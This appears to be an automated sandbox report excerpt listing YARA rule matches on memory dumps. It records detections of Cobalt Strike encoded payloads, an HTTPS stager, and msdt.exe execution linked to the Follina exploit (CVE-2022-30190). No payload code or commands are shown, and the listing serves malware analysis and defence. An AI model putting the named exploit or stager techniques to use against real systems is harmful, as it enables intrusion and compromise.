        Source: 00000009.00000002.556693839.0000000000F50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
        Source: 00000019.00000003.503297847.00000000066F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500310887.0000000006DF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.505719347.0000000006392000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500548113.0000000006DC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000009.00000002.585006641.0000000003700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
        Source: 00000019.00000003.500261822.0000000006E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500418706.0000000006DDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000002.568673308.0000000006E23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.507852725.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000002.568682358.0000000006E26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508838061.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499473983.0000000006E97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 0000001E.00000002.556428060.0000000002CE0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500155514.0000000006E1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499623622.0000000006E7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508459967.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000002.568748602.0000000006E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000002.568710134.0000000006E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.507100056.00000000060F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499889442.0000000006E4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.506175810.00000000062EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508628056.0000000005D0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499641627.0000000006E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499824941.0000000006E5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.506705393.000000000618E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.501596100.0000000006A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.501243619.0000000006B54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500112961.0000000006E27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499962160.0000000006E3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500328316.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000002.568738886.0000000006E3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.509561363.0000000005B0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.507377946.0000000006041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000002.568792297.0000000006E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000009.00000002.582026384.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
        Source: 00000019.00000003.499598965.0000000006E84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.504952600.000000000646C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500604850.0000000006CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499944069.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.504750760.00000000064EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.502123395.00000000068FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499912534.0000000006E47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500175997.0000000006E14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.506567409.0000000006230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499654163.0000000006E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500392333.0000000006DE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500656702.0000000006C3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500133947.0000000006E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.507760692.0000000005EF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499706418.0000000006E6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.504345055.000000000656C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499750187.0000000006E67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499521324.0000000006E8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508543817.0000000005DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.501697332.0000000006A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.501200856.0000000006C04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.509127714.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500032754.0000000006E31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000002.567918240.0000000006071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.502899282.0000000006741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.503663386.0000000006640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500236769.0000000006E0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.507414149.0000000006071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.509264079.0000000005B78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.507996577.0000000005E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499506056.0000000006E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508112663.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499764114.0000000006E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500280490.0000000006DFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.507642082.0000000005F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000002.567865973.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500590066.0000000006DBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.503439579.00000000066C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.502667836.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.502479061.0000000006841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.507423559.0000000005FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.502365955.00000000067F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499804770.0000000006E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508327386.0000000005DBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508977198.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508083711.0000000005EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.507943546.0000000005E86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500124456.0000000006E24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499664750.0000000006E74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.507900626.0000000005F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.502171014.0000000006880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.501943577.0000000006902000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499900664.0000000006E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.501775845.00000000069FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.507263765.000000000606A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.505360761.00000000063EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000009.00000002.556829484.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
        Source: 00000019.00000003.506426333.000000000626E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500371775.0000000006DEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.509507876.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000002.568633989.0000000006E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500271247.0000000006E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.509762082.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000002.568691207.0000000006E29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.507305461.0000000005FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500574937.0000000006DC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500300611.0000000006DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500381322.0000000006DE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499851554.0000000006E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000002.568719259.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.504543226.0000000006527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000002.569049205.0000000006E9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499716165.0000000006E6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.506765353.0000000006170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.506625375.00000000061EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.509636935.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508201854.0000000005DC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.501854915.0000000006980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499572225.0000000006E8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500537921.0000000006DCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
